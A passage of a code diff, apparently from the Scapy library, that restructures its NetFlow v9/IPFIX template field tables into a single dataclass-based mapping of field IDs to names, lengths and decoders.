- 409 + NTOP_BASE: "S1AP_MSG_EMM_TYPE_MME_TO_ENB", - 410 + NTOP_BASE: "S1AP_MSG_ESM_TYPE_MME_TO_ENB", - 411 + NTOP_BASE: "S1AP_MSG_EMM_TYPE_ENB_TO_MME", - 412 + NTOP_BASE: "S1AP_MSG_ESM_TYPE_ENB_TO_MME", - 413 + NTOP_BASE: "S1AP_CAUSE_ENB_TO_MME", - 414 + NTOP_BASE: "S1AP_DETAILED_CAUSE_ENB_TO_MME", - 415 + NTOP_BASE: "TCP_WIN_MIN_IN", - 416 + NTOP_BASE: "TCP_WIN_MAX_IN", - 417 + NTOP_BASE: "TCP_WIN_MSS_IN", - 418 + NTOP_BASE: "TCP_WIN_SCALE_IN", - 419 + NTOP_BASE: "TCP_WIN_MIN_OUT", - 420 + NTOP_BASE: "TCP_WIN_MAX_OUT", - 421 + NTOP_BASE: "TCP_WIN_MSS_OUT", - 422 + NTOP_BASE: "TCP_WIN_SCALE_OUT", - 423 + NTOP_BASE: "DHCP_REMOTE_ID", - 424 + NTOP_BASE: "DHCP_SUBSCRIBER_ID", - 425 + NTOP_BASE: "SRC_PROC_UID", - 426 + NTOP_BASE: "DST_PROC_UID", - 427 + NTOP_BASE: "APPLICATION_NAME", - 428 + NTOP_BASE: "USER_NAME", - 429 + NTOP_BASE: "DHCP_MESSAGE_TYPE", - 430 + NTOP_BASE: "RTP_IN_PKT_DROP", - 431 + NTOP_BASE: "RTP_OUT_PKT_DROP", - 432 + NTOP_BASE: "RTP_OUT_MOS", - 433 + NTOP_BASE: "RTP_OUT_R_FACTOR", - 434 + NTOP_BASE: "RTP_MOS", - 435 + NTOP_BASE: "GTPV2_S5_S8_GTPC_TEID", - 436 + NTOP_BASE: "RTP_R_FACTOR", - 437 + NTOP_BASE: "RTP_SSRC", - 438 + NTOP_BASE: "PAYLOAD_HASH", - 439 + NTOP_BASE: "GTPV2_C2S_S5_S8_GTPU_TEID", - 440 + NTOP_BASE: "GTPV2_S2C_S5_S8_GTPU_TEID", - 441 + NTOP_BASE: "GTPV2_C2S_S5_S8_GTPU_IP", - 442 + NTOP_BASE: "GTPV2_S2C_S5_S8_GTPU_IP", - 443 + NTOP_BASE: "SRC_AS_MAP", - 444 + NTOP_BASE: "DST_AS_MAP", - 445 + NTOP_BASE: "DIAMETER_HOP_BY_HOP_ID", - 446 + NTOP_BASE: "UPSTREAM_SESSION_ID", - 447 + NTOP_BASE: "DOWNSTREAM_SESSION_ID", - 448 + NTOP_BASE: "SRC_IP_LONG", - 449 + NTOP_BASE: "SRC_IP_LAT", - 450 + NTOP_BASE: "DST_IP_LONG", - 451 + NTOP_BASE: "DST_IP_LAT", - 452 + NTOP_BASE: "DIAMETER_CLR_CANCEL_TYPE", - 453 + NTOP_BASE: "DIAMETER_CLR_FLAGS", - 454 + NTOP_BASE: "GTPV2_C2S_S5_S8_GTPC_IP", - 455 + NTOP_BASE: "GTPV2_S2C_S5_S8_GTPC_IP", - 456 + NTOP_BASE: "GTPV2_C2S_S5_S8_SGW_GTPU_TEID", - 457 + NTOP_BASE: "GTPV2_S2C_S5_S8_SGW_GTPU_TEID", - 458 + NTOP_BASE: "GTPV2_C2S_S5_S8_SGW_GTPU_IP", - 459 + NTOP_BASE: "GTPV2_S2C_S5_S8_SGW_GTPU_IP", - 460 + NTOP_BASE: "HTTP_X_FORWARDED_FOR", - 461 + NTOP_BASE: "HTTP_VIA", - 462 + NTOP_BASE: "SSDP_HOST", - 463 + NTOP_BASE: "SSDP_USN", - 464 + NTOP_BASE: "NETBIOS_QUERY_NAME", - 465 + NTOP_BASE: "NETBIOS_QUERY_TYPE", - 466 + NTOP_BASE: "NETBIOS_RESPONSE", - 467 + NTOP_BASE: "NETBIOS_QUERY_OS", - 468 + NTOP_BASE: "SSDP_SERVER", - 469 + NTOP_BASE: "SSDP_TYPE", - 470 + NTOP_BASE: "SSDP_METHOD", - 471 + NTOP_BASE: "NPROBE_IPV4_ADDRESS", -} -ScopeFieldTypes = { - 1: "System", - 2: "Interface", - 3: "Line card", - 4: "Cache", - 5: "Template", -} +@dataclasses.dataclass +class _N910F: + name: str + length: int = 0 + field: Field = None + kwargs: Dict[str, Any] = dataclasses.field(default_factory=dict) -NetflowV9TemplateFieldDefaultLengths = { - 1: 4, - 2: 4, - 3: 4, - 4: 1, - 5: 1, - 6: 1, - 7: 2, - 8: 4, - 9: 1, - 10: 2, - 11: 2, - 12: 4, - 13: 1, - 14: 2, - 15: 4, - 16: 2, - 17: 2, - 18: 4, - 19: 4, - 20: 4, - 21: 4, - 22: 4, - 23: 4, - 24: 4, - 27: 16, - 28: 16, - 29: 1, - 30: 1, - 31: 3, - 32: 2, - 33: 1, - 34: 4, - 35: 1, - 36: 2, - 37: 2, - 38: 1, - 39: 1, - 40: 4, - 41: 4, - 42: 4, - 46: 1, - 47: 4, - 48: 4, # from ERRATA - 49: 1, - 50: 4, - 55: 1, - 56: 6, - 57: 6, - 58: 2, - 59: 2, - 60: 1, - 61: 1, - 62: 16, - 63: 16, - 64: 4, - 70: 3, - 71: 3, - 72: 3, - 73: 3, - 74: 3, - 75: 3, - 76: 3, - 77: 3, - 78: 3, - 79: 3, - 195: 1, -} # NetflowV9 Ready-made fields - class ShortOrInt(IntField): def getfield(self, pkt, x): if len(x) == 2: @@ -1142,119 +246,991 @@ def __init__(self, name, default, *args, **kargs): self, name, default, length ) - -# TODO: There are hundreds of entries to add to the following :( -# https://tools.ietf.org/html/rfc5655 +# TODO: There are hundreds of entries to add to the following list :( +# it's thus incomplete. +# https://www.iana.org/assignments/ipfix/ipfix.xml # ==> feel free to contribute :D -NetflowV9TemplateFieldDecoders = { - # Only contains fields that have a fixed length - # ID: Field, - # or - # ID: (Field, [*optional_parameters]), - 4: (ByteEnumField, [IP_PROTOS]), # PROTOCOL - 5: XByteField, # TOS - 6: ByteField, # TCP_FLAGS - 7: ShortField, # L4_SRC_PORT - 8: IPField, # IPV4_SRC_ADDR - 9: ByteField, # SRC_MASK - 11: ShortField, # L4_DST_PORT - 12: IPField, # IPV4_DST_PORT - 13: ByteField, # DST_MASK - 15: IPField, # IPv4_NEXT_HOP - 16: ShortOrInt, # SRC_AS - 17: ShortOrInt, # DST_AS - 18: IPField, # BGP_IPv4_NEXT_HOP - 21: (SecondsIntField, [True]), # LAST_SWITCHED - 22: (SecondsIntField, [True]), # FIRST_SWITCHED - 27: IP6Field, # IPV6_SRC_ADDR - 28: IP6Field, # IPV6_DST_ADDR - 29: ByteField, # IPV6_SRC_MASK - 30: ByteField, # IPV6_DST_MASK - 31: ThreeBytesField, # IPV6_FLOW_LABEL - 32: XShortField, # ICMP_TYPE - 33: ByteField, # MUL_IGMP_TYPE - 34: IntField, # SAMPLING_INTERVAL - 35: XByteField, # SAMPLING_ALGORITHM - 36: ShortField, # FLOW_ACTIVE_TIMEOUT - 37: ShortField, # FLOW_ACTIVE_TIMEOUT - 38: ByteField, # ENGINE_TYPE - 39: ByteField, # ENGINE_ID - 46: (ByteEnumField, [{0x00: "UNKNOWN", 0x01: "TE-MIDPT", 0x02: "ATOM", 0x03: "VPN", 0x04: "BGP", 0x05: "LDP"}]), # MPLS_TOP_LABEL_TYPE # noqa: E501 - 47: IPField, # MPLS_TOP_LABEL_IP_ADDR - 48: ByteField, # FLOW_SAMPLER_ID - 49: ByteField, # FLOW_SAMPLER_MODE - 50: IntField, # FLOW_SAMPLER_RANDOM_INTERVAL - 55: XByteField, # DST_TOS - 56: MACField, # SRC_MAC - 57: MACField, # DST_MAC - 58: ShortField, # SRC_VLAN - 59: ShortField, # DST_VLAN - 60: ByteField, # IP_PROTOCOL_VERSION - 61: (ByteEnumField, [{0x00: "Ingress flow", 0x01: "Egress flow"}]), # DIRECTION # noqa: E501 - 62: IP6Field, # IPV6_NEXT_HOP - 63: IP6Field, # BGP_IPV6_NEXT_HOP - 130: IPField, # exporterIPv4Address - 131: IP6Field, # exporterIPv6Address - 150: N9UTCTimeField, # flowStartSeconds - 151: N9UTCTimeField, # flowEndSeconds - 152: (N9UTCTimeField, [True]), # flowStartMilliseconds - 153: (N9UTCTimeField, [True]), # flowEndMilliseconds - 154: (N9UTCTimeField, [False, True]), # flowStartMicroseconds - 155: (N9UTCTimeField, [False, True]), # flowEndMicroseconds - 156: (N9UTCTimeField, [False, False, True]), # flowStartNanoseconds - 157: (N9UTCTimeField, [False, False, True]), # flowEndNanoseconds - 158: (N9SecondsIntField, [False, True]), # flowStartDeltaMicroseconds - 159: (N9SecondsIntField, [False, True]), # flowEndDeltaMicroseconds - 160: (N9UTCTimeField, [True]), # systemInitTimeMilliseconds - 161: (N9SecondsIntField, [True]), # flowDurationMilliseconds - 162: (N9SecondsIntField, [False, True]), # flowDurationMicroseconds - 195: XByteField, # IP_DSCP - 211: IPField, # collectorIPv4Address - 212: IP6Field, # collectorIPv6Address - 225: IPField, # postNATSourceIPv4Address - 226: IPField, # postNATDestinationIPv4Address - 258: (N9SecondsIntField, [True]), # collectionTimeMilliseconds - 260: N9SecondsIntField, # maxExportSeconds - 261: N9SecondsIntField, # maxFlowEndSeconds - 264: N9SecondsIntField, # minExportSeconds - 265: N9SecondsIntField, # minFlowStartSeconds - 268: (N9UTCTimeField, [False, True]), # maxFlowEndMicroseconds - 269: (N9UTCTimeField, [True]), # maxFlowEndMilliseconds - 270: (N9UTCTimeField, [False, False, True]), # maxFlowEndNanoseconds - 271: (N9UTCTimeField, [False, True]), # minFlowStartMicroseconds - 272: (N9UTCTimeField, [True]), # minFlowStartMilliseconds - 273: (N9UTCTimeField, [False, False, True]), # minFlowStartNanoseconds - 279: N9SecondsIntField, # connectionSumDurationSeconds - 281: IP6Field, # postNATSourceIPv6Address - 282: IP6Field, # postNATDestinationIPv6Address - 322: N9UTCTimeField, # observationTimeSeconds - 323: (N9UTCTimeField, [True]), # observationTimeMilliseconds - 324: (N9UTCTimeField, [False, True]), # observationTimeMicroseconds - 325: (N9UTCTimeField, [False, False, True]), # observationTimeNanoseconds - 365: MACField, # staMacAddress - 366: IPField, # staIPv4Address - 367: MACField, # wtpMacAddress - 380: IPField, # distinctCountOfSourceIPv4Address - 381: IPField, # distinctCountOfDestinationIPv4Address - 382: IP6Field, # distinctCountOfSourceIPv6Address - 383: IP6Field, # distinctCountOfDestinationIPv6Address - 403: IPField, # originalExporterIPv4Address - 404: IP6Field, # originalExporterIPv6Address - 414: MACField, # dot1qCustomerSourceMacAddress - 415: MACField, # dot1qCustomerDestinationMacAddress - 432: IPField, # pseudoWireDestinationIPv4Address - 24632: IPField, # NAT_LOG_FIELD_IDX_IPV4_INT_ADDR - 24633: IPField, # NAT_LOG_FIELD_IDX_IPV4_EXT_ADDR - 40001: IPField, # XLATE_SRC_ADDR_IPV4 - 40002: IPField, # XLATE_DST_ADDR_IPV4 - 114 + NTOP_BASE: IPField, # UNTUNNELED_IPV4_SRC_ADDR - 116 + NTOP_BASE: IPField, # UNTUNNELED_IPV4_DST_ADDR - 143 + NTOP_BASE: IPField, # SIP_RTP_IPV4_SRC_ADDR - 145 + NTOP_BASE: IPField, # SIP_RTP_IPV4_DST_ADDR - 353 + NTOP_BASE: MACField, # DHCP_CLIENT_MAC - 396 + NTOP_BASE: IP6Field, # UNTUNNELED_IPV6_SRC_ADDR - 397 + NTOP_BASE: IP6Field, # UNTUNNELED_IPV6_DST_ADDR - 471 + NTOP_BASE: IPField, # NPROBE_IPV4_ADDRESS + +# XXX: we should probably switch the names below to IANA normalized ones. + +# This is v9_v10_template_types (with names from the rfc for the first 79) +# https://github.com/wireshark/wireshark/blob/master/epan/dissectors/packet-netflow.c # noqa: E501 +# (it has all values external to the RFC) + + +NTOP_BASE = 57472 +NetflowV910TemplateFields = { + 1: _N910F("IN_BYTES", length=4), + 2: _N910F("IN_PKTS", length=4), + 3: _N910F("FLOWS", length=4), + 4: _N910F("PROTOCOL", length=1, + field=ByteEnumField, kwargs={"enum": IP_PROTOS}), + 5: _N910F("TOS", length=1, + field=XByteField), + 6: _N910F("TCP_FLAGS", length=1, + field=ByteField), + 7: _N910F("L4_SRC_PORT", length=2, + field=ShortField), + 8: _N910F("IPV4_SRC_ADDR", length=4, + field=IPField), + 9: _N910F("SRC_MASK", length=1, + field=ByteField), + 10: _N910F("INPUT_SNMP"), + 11: _N910F("L4_DST_PORT", length=2, + field=ShortField), + 12: _N910F("IPV4_DST_ADDR", length=4, + field=IPField), + 13: _N910F("DST_MASK", length=1, + field=ByteField), + 14: _N910F("OUTPUT_SNMP"), + 15: _N910F("IPV4_NEXT_HOP", length=4, + field=IPField), + 16: _N910F("SRC_AS", length=2, + field=ShortOrInt), + 17: _N910F("DST_AS", length=2, + field=ShortOrInt), + 18: _N910F("BGP_IPV4_NEXT_HOP", length=4, + field=IPField), + 19: _N910F("MUL_DST_PKTS", length=4), + 20: _N910F("MUL_DST_BYTES", length=4), + 21: _N910F("LAST_SWITCHED", length=4, + field=SecondsIntField, + kwargs={"use_msec": True}), + 22: _N910F("FIRST_SWITCHED", length=4, + field=SecondsIntField, + kwargs={"use_msec": True}), + 23: _N910F("OUT_BYTES", length=4), + 24: _N910F("OUT_PKTS", length=4), + 25: _N910F("IP_LENGTH_MINIMUM"), + 26: _N910F("IP_LENGTH_MAXIMUM"), + 27: _N910F("IPV6_SRC_ADDR", length=16, + field=IP6Field), + 28: _N910F("IPV6_DST_ADDR", length=16, + field=IP6Field), + 29: _N910F("IPV6_SRC_MASK", length=1, + field=ByteField), + 30: _N910F("IPV6_DST_MASK", length=1, + field=ByteField), + 31: _N910F("IPV6_FLOW_LABEL", length=3, + field=ThreeBytesField), + 32: _N910F("ICMP_TYPE", length=2, + field=XShortField), + 33: _N910F("MUL_IGMP_TYPE", length=1, + field=ByteField), + 34: _N910F("SAMPLING_INTERVAL", length=4, + field=IntField), + 35: _N910F("SAMPLING_ALGORITHM", length=1, + field=XByteField), + 36: _N910F("FLOW_ACTIVE_TIMEOUT", length=2, + field=ShortField), + 37: _N910F("FLOW_INACTIVE_TIMEOUT", length=2, + field=ShortField), + 38: _N910F("ENGINE_TYPE", length=1, + field=ByteField), + 39: _N910F("ENGINE_ID", length=1, + field=ByteField), + 40: _N910F("TOTAL_BYTES_EXP", length=4), + 41: _N910F("TOTAL_PKTS_EXP", length=4), + 42: _N910F("TOTAL_FLOWS_EXP", length=4), + 43: _N910F("IPV4_ROUTER_SC"), + 44: _N910F("IP_SRC_PREFIX"), + 45: _N910F("IP_DST_PREFIX"), + 46: _N910F("MPLS_TOP_LABEL_TYPE", length=1, + field=ByteEnumField, + kwargs={"enum": { + 0x00: "UNKNOWN", + 0x01: "TE-MIDPT", + 0x02: "ATOM", + 0x03: "VPN", + 0x04: "BGP", + 0x05: "LDP", + }}), + 47: _N910F("MPLS_TOP_LABEL_IP_ADDR", length=4, + field=IPField), + 48: _N910F("FLOW_SAMPLER_ID", length=4), # from ERRATA + 49: _N910F("FLOW_SAMPLER_MODE", length=1, + field=ByteField), + 50: _N910F("FLOW_SAMPLER_RANDOM_INTERVAL", length=4, + field=IntField), + 51: _N910F("FLOW_CLASS"), + 52: _N910F("MIN_TTL"), + 53: _N910F("MAX_TTL"), + 54: _N910F("IPV4_IDENT"), + 55: _N910F("DST_TOS", length=1, + field=XByteField), + 56: _N910F("SRC_MAC", length=6, + field=MACField), + 57: _N910F("DST_MAC", length=6, + field=MACField), + 58: _N910F("SRC_VLAN", length=2, + field=ShortField), + 59: _N910F("DST_VLAN", length=2, + field=ShortField), + 60: _N910F("IP_PROTOCOL_VERSION", length=1, + field=ByteField), + 61: _N910F("DIRECTION", length=1, + field=ByteEnumField, + kwargs={"enum": {0x00: "Ingress flow", 0x01: "Egress flow"}}), + 62: _N910F("IPV6_NEXT_HOP", length=16, + field=IP6Field), + 63: _N910F("BGP_IPV6_NEXT_HOP", length=16, + field=IP6Field), + 64: _N910F("IPV6_OPTION_HEADERS", length=4), + 70: _N910F("MPLS_LABEL_1", length=3), + 71: _N910F("MPLS_LABEL_2", length=3), + 72: _N910F("MPLS_LABEL_3", length=3), + 73: _N910F("MPLS_LABEL_4", length=3), + 74: _N910F("MPLS_LABEL_5", length=3), + 75: _N910F("MPLS_LABEL_6", length=3), + 76: _N910F("MPLS_LABEL_7", length=3), + 77: _N910F("MPLS_LABEL_8", length=3), + 78: _N910F("MPLS_LABEL_9", length=3), + 79: _N910F("MPLS_LABEL_10", length=3), + 80: _N910F("DESTINATION_MAC"), + 81: _N910F("SOURCE_MAC"), + 82: _N910F("IF_NAME"), + 83: _N910F("IF_DESC"), + 84: _N910F("SAMPLER_NAME"), + 85: _N910F("BYTES_TOTAL"), + 86: _N910F("PACKETS_TOTAL"), + 88: _N910F("FRAGMENT_OFFSET"), + 89: _N910F("FORWARDING_STATUS"), + 90: _N910F("VPN_ROUTE_DISTINGUISHER"), + 91: _N910F("mplsTopLabelPrefixLength"), + 92: _N910F("SRC_TRAFFIC_INDEX"), + 93: _N910F("DST_TRAFFIC_INDEX"), + 94: _N910F("APPLICATION_DESC"), + 95: _N910F("APPLICATION_ID"), + 96: _N910F("APPLICATION_NAME"), + 98: _N910F("postIpDiffServCodePoint"), + 99: _N910F("multicastReplicationFactor"), + 101: _N910F("classificationEngineId"), + 128: _N910F("DST_AS_PEER"), + 129: _N910F("SRC_AS_PEER"), + 130: _N910F("exporterIPv4Address", length=4, + field=IPField), + 131: _N910F("exporterIPv6Address", length=16, + field=IP6Field), + 132: _N910F("DROPPED_BYTES"), + 133: _N910F("DROPPED_PACKETS"), + 134: _N910F("DROPPED_BYTES_TOTAL"), + 135: _N910F("DROPPED_PACKETS_TOTAL"), + 136: _N910F("flowEndReason"), + 137: _N910F("commonPropertiesId"), + 138: _N910F("observationPointId"), + 139: _N910F("icmpTypeCodeIPv6"), + 140: _N910F("MPLS_TOP_LABEL_IPv6_ADDRESS"), + 141: _N910F("lineCardId"), + 142: _N910F("portId"), + 143: _N910F("meteringProcessId"), + 144: _N910F("FLOW_EXPORTER"), + 145: _N910F("templateId"), + 146: _N910F("wlanChannelId"), + 147: _N910F("wlanSSID"), + 148: _N910F("flowId"), + 149: _N910F("observationDomainId"), + 150: _N910F("flowStartSeconds", length=8, + field=N9UTCTimeField), + 151: _N910F("flowEndSeconds", length=8, + field=N9UTCTimeField), + 152: _N910F("flowStartMilliseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_msec": True}), + 153: _N910F("flowEndMilliseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_msec": True}), + 154: _N910F("flowStartMicroseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_micro": True}), + 155: _N910F("flowEndMicroseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_micro": True}), + 156: _N910F("flowStartNanoseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_nano": True}), + 157: _N910F("flowEndNanoseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_nano": True}), + 158: _N910F("flowStartDeltaMicroseconds", length=8, + field=N9SecondsIntField, + kwargs={"use_micro": True}), + 159: _N910F("flowEndDeltaMicroseconds", length=8, + field=N9SecondsIntField, + kwargs={"use_micro": True}), + 160: _N910F("systemInitTimeMilliseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_msec": True}), + 161: _N910F("flowDurationMilliseconds", length=8, + field=N9SecondsIntField, + kwargs={"use_msec": True}), + 162: _N910F("flowDurationMicroseconds", length=8, + field=N9SecondsIntField, + kwargs={"use_micro": True}), + 163: _N910F("observedFlowTotalCount"), + 164: _N910F("ignoredPacketTotalCount"), + 165: _N910F("ignoredOctetTotalCount"), + 166: _N910F("notSentFlowTotalCount"), + 167: _N910F("notSentPacketTotalCount"), + 168: _N910F("notSentOctetTotalCount"), + 169: _N910F("destinationIPv6Prefix"), + 170: _N910F("sourceIPv6Prefix"), + 171: _N910F("postOctetTotalCount"), + 172: _N910F("postPacketTotalCount"), + 173: _N910F("flowKeyIndicator"), + 174: _N910F("postMCastPacketTotalCount"), + 175: _N910F("postMCastOctetTotalCount"), + 176: _N910F("ICMP_IPv4_TYPE"), + 177: _N910F("ICMP_IPv4_CODE"), + 178: _N910F("ICMP_IPv6_TYPE"), + 179: _N910F("ICMP_IPv6_CODE"), + 180: _N910F("UDP_SRC_PORT"), + 181: _N910F("UDP_DST_PORT"), + 182: _N910F("TCP_SRC_PORT"), + 183: _N910F("TCP_DST_PORT"), + 184: _N910F("TCP_SEQ_NUM"), + 185: _N910F("TCP_ACK_NUM"), + 186: _N910F("TCP_WINDOW_SIZE"), + 187: _N910F("TCP_URGENT_PTR"), + 188: _N910F("TCP_HEADER_LEN"), + 189: _N910F("IP_HEADER_LEN"), + 190: _N910F("IP_TOTAL_LEN"), + 191: _N910F("payloadLengthIPv6"), + 192: _N910F("IP_TTL"), + 193: _N910F("nextHeaderIPv6"), + 194: _N910F("mplsPayloadLength"), + 195: _N910F("IP_DSCP", length=1, + field=XByteField), + 196: _N910F("IP_PRECEDENCE"), + 197: _N910F("IP_FRAGMENT_FLAGS"), + 198: _N910F("DELTA_BYTES_SQUARED"), + 199: _N910F("TOTAL_BYTES_SQUARED"), + 200: _N910F("MPLS_TOP_LABEL_TTL"), + 201: _N910F("MPLS_LABEL_STACK_OCTETS"), + 202: _N910F("MPLS_LABEL_STACK_DEPTH"), + 203: _N910F("MPLS_TOP_LABEL_EXP"), + 204: _N910F("IP_PAYLOAD_LENGTH"), + 205: _N910F("UDP_LENGTH"), + 206: _N910F("IS_MULTICAST"), + 207: _N910F("IP_HEADER_WORDS"), + 208: _N910F("IP_OPTION_MAP"), + 209: _N910F("TCP_OPTION_MAP"), + 210: _N910F("paddingOctets"), + 211: _N910F("collectorIPv4Address", length=4, + field=IPField), + 212: _N910F("collectorIPv6Address", length=16, + field=IP6Field), + 213: _N910F("collectorInterface"), + 214: _N910F("collectorProtocolVersion"), + 215: _N910F("collectorTransportProtocol"), + 216: _N910F("collectorTransportPort"), + 217: _N910F("exporterTransportPort"), + 218: _N910F("tcpSynTotalCount"), + 219: _N910F("tcpFinTotalCount"), + 220: _N910F("tcpRstTotalCount"), + 221: _N910F("tcpPshTotalCount"), + 222: _N910F("tcpAckTotalCount"), + 223: _N910F("tcpUrgTotalCount"), + 224: _N910F("ipTotalLength"), + 225: _N910F("postNATSourceIPv4Address", length=4, + field=IPField), + 226: _N910F("postNATDestinationIPv4Address", length=4, + field=IPField), + 227: _N910F("postNAPTSourceTransportPort"), + 228: _N910F("postNAPTDestinationTransportPort"), + 229: _N910F("natOriginatingAddressRealm"), + 230: _N910F("natEvent"), + 231: _N910F("initiatorOctets"), + 232: _N910F("responderOctets"), + 233: _N910F("firewallEvent"), + 234: _N910F("ingressVRFID"), + 235: _N910F("egressVRFID"), + 236: _N910F("VRFname"), + 237: _N910F("postMplsTopLabelExp"), + 238: _N910F("tcpWindowScale"), + 239: _N910F("biflowDirection"), + 240: _N910F("ethernetHeaderLength"), + 241: _N910F("ethernetPayloadLength"), + 242: _N910F("ethernetTotalLength"), + 243: _N910F("dot1qVlanId"), + 244: _N910F("dot1qPriority"), + 245: _N910F("dot1qCustomerVlanId"), + 246: _N910F("dot1qCustomerPriority"), + 247: _N910F("metroEvcId"), + 248: _N910F("metroEvcType"), + 249: _N910F("pseudoWireId"), + 250: _N910F("pseudoWireType"), + 251: _N910F("pseudoWireControlWord"), + 252: _N910F("ingressPhysicalInterface"), + 253: _N910F("egressPhysicalInterface"), + 254: _N910F("postDot1qVlanId"), + 255: _N910F("postDot1qCustomerVlanId"), + 256: _N910F("ethernetType"), + 257: _N910F("postIpPrecedence"), + 258: _N910F("collectionTimeMilliseconds", length=8, + field=N9SecondsIntField, + kwargs={"use_msec": True}), + 259: _N910F("exportSctpStreamId"), + 260: _N910F("maxExportSeconds", length=8, + field=N9SecondsIntField), + 261: _N910F("maxFlowEndSeconds", length=8, + field=N9SecondsIntField), + 262: _N910F("messageMD5Checksum"), + 263: _N910F("messageScope"), + 264: _N910F("minExportSeconds", length=8, + field=N9SecondsIntField), + 265: _N910F("minFlowStartSeconds", length=8, + field=N9SecondsIntField), + 266: _N910F("opaqueOctets"), + 267: _N910F("sessionScope"), + 268: _N910F("maxFlowEndMicroseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_micro": True}), + 269: _N910F("maxFlowEndMilliseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_msec": True}), + 270: _N910F("maxFlowEndNanoseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_nano": True}), + 271: _N910F("minFlowStartMicroseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_micro": True}), + 272: _N910F("minFlowStartMilliseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_msec": True}), + 273: _N910F("minFlowStartNanoseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_nano": True}), + 274: _N910F("collectorCertificate"), + 275: _N910F("exporterCertificate"), + 276: _N910F("dataRecordsReliability"), + 277: _N910F("observationPointType"), + 278: _N910F("newConnectionDeltaCount"), + 279: _N910F("connectionSumDurationSeconds", length=8, + field=N9SecondsIntField), + 280: _N910F("connectionTransactionId"), + 281: _N910F("postNATSourceIPv6Address", length=16, + field=IP6Field), + 282: _N910F("postNATDestinationIPv6Address", length=16, + field=IP6Field), + 283: _N910F("natPoolId"), + 284: _N910F("natPoolName"), + 285: _N910F("anonymizationFlags"), + 286: _N910F("anonymizationTechnique"), + 287: _N910F("informationElementIndex"), + 288: _N910F("p2pTechnology"), + 289: _N910F("tunnelTechnology"), + 290: _N910F("encryptedTechnology"), + 291: _N910F("basicList"), + 292: _N910F("subTemplateList"), + 293: _N910F("subTemplateMultiList"), + 294: _N910F("bgpValidityState"), + 295: _N910F("IPSecSPI"), + 296: _N910F("greKey"), + 297: _N910F("natType"), + 298: _N910F("initiatorPackets"), + 299: _N910F("responderPackets"), + 300: _N910F("observationDomainName"), + 301: _N910F("selectionSequenceId"), + 302: _N910F("selectorId"), + 303: _N910F("informationElementId"), + 304: _N910F("selectorAlgorithm"), + 305: _N910F("samplingPacketInterval"), + 306: _N910F("samplingPacketSpace"), + 307: _N910F("samplingTimeInterval"), + 308: _N910F("samplingTimeSpace"), + 309: _N910F("samplingSize"), + 310: _N910F("samplingPopulation"), + 311: _N910F("samplingProbability"), + 312: _N910F("dataLinkFrameSize"), + 313: _N910F("IP_SECTION_HEADER"), + 314: _N910F("IP_SECTION_PAYLOAD"), + 315: _N910F("dataLinkFrameSection"), + 316: _N910F("mplsLabelStackSection"), + 317: _N910F("mplsPayloadPacketSection"), + 318: _N910F("selectorIdTotalPktsObserved"), + 319: _N910F("selectorIdTotalPktsSelected"), + 320: _N910F("absoluteError"), + 321: _N910F("relativeError"), + 322: _N910F("observationTimeSeconds", length=8, + field=N9UTCTimeField), + 323: _N910F("observationTimeMilliseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_msec": True}), + 324: _N910F("observationTimeMicroseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_micro": True}), + 325: _N910F("observationTimeNanoseconds", length=8, + field=N9UTCTimeField, + kwargs={"use_nano": True}), + 326: _N910F("digestHashValue"), + 327: _N910F("hashIPPayloadOffset"), + 328: _N910F("hashIPPayloadSize"), + 329: _N910F("hashOutputRangeMin"), + 330: _N910F("hashOutputRangeMax"), + 331: _N910F("hashSelectedRangeMin"), + 332: _N910F("hashSelectedRangeMax"), + 333: _N910F("hashDigestOutput"), + 334: _N910F("hashInitialiserValue"), + 335: _N910F("selectorName"), + 336: _N910F("upperCILimit"), + 337: _N910F("lowerCILimit"), + 338: _N910F("confidenceLevel"), + 339: _N910F("informationElementDataType"), + 340: _N910F("informationElementDescription"), + 341: _N910F("informationElementName"), + 342: _N910F("informationElementRangeBegin"), + 343: _N910F("informationElementRangeEnd"), + 344: _N910F("informationElementSemantics"), + 345: _N910F("informationElementUnits"), + 346: _N910F("privateEnterpriseNumber"), + 347: _N910F("virtualStationInterfaceId"), + 348: _N910F("virtualStationInterfaceName"), + 349: _N910F("virtualStationUUID"), + 350: _N910F("virtualStationName"), + 351: _N910F("layer2SegmentId"), + 352: _N910F("layer2OctetDeltaCount"), + 353: _N910F("layer2OctetTotalCount"), + 354: _N910F("ingressUnicastPacketTotalCount"), + 355: _N910F("ingressMulticastPacketTotalCount"), + 356: _N910F("ingressBroadcastPacketTotalCount"), + 357: _N910F("egressUnicastPacketTotalCount"), + 358: _N910F("egressBroadcastPacketTotalCount"), + 359: _N910F("monitoringIntervalStartMilliSeconds"), + 360: _N910F("monitoringIntervalEndMilliSeconds"), + 361: _N910F("portRangeStart"), + 362: _N910F("portRangeEnd"), + 363: _N910F("portRangeStepSize"), + 364: _N910F("portRangeNumPorts"), + 365: _N910F("staMacAddress", length=6, + field=MACField), + 366: _N910F("staIPv4Address", length=4, + field=IPField), + 367: _N910F("wtpMacAddress", length=6, + field=MACField), + 368: _N910F("ingressInterfaceType"), + 369: _N910F("egressInterfaceType"), + 370: _N910F("rtpSequenceNumber"), + 371: _N910F("userName"), + 372: _N910F("applicationCategoryName"), + 373: _N910F("applicationSubCategoryName"), + 374: _N910F("applicationGroupName"), + 375: _N910F("originalFlowsPresent"), + 376: _N910F("originalFlowsInitiated"), + 377: _N910F("originalFlowsCompleted"), + 378: _N910F("distinctCountOfSourceIPAddress"), + 379: _N910F("distinctCountOfDestinationIPAddress"), + 380: _N910F("distinctCountOfSourceIPv4Address", length=4, + field=IPField), + 381: _N910F("distinctCountOfDestinationIPv4Address", length=4, + field=IPField), + 382: _N910F("distinctCountOfSourceIPv6Address", length=16, + field=IP6Field), + 383: _N910F("distinctCountOfDestinationIPv6Address", length=16, + field=IP6Field), + 384: _N910F("valueDistributionMethod"), + 385: _N910F("rfc3550JitterMilliseconds"), + 386: 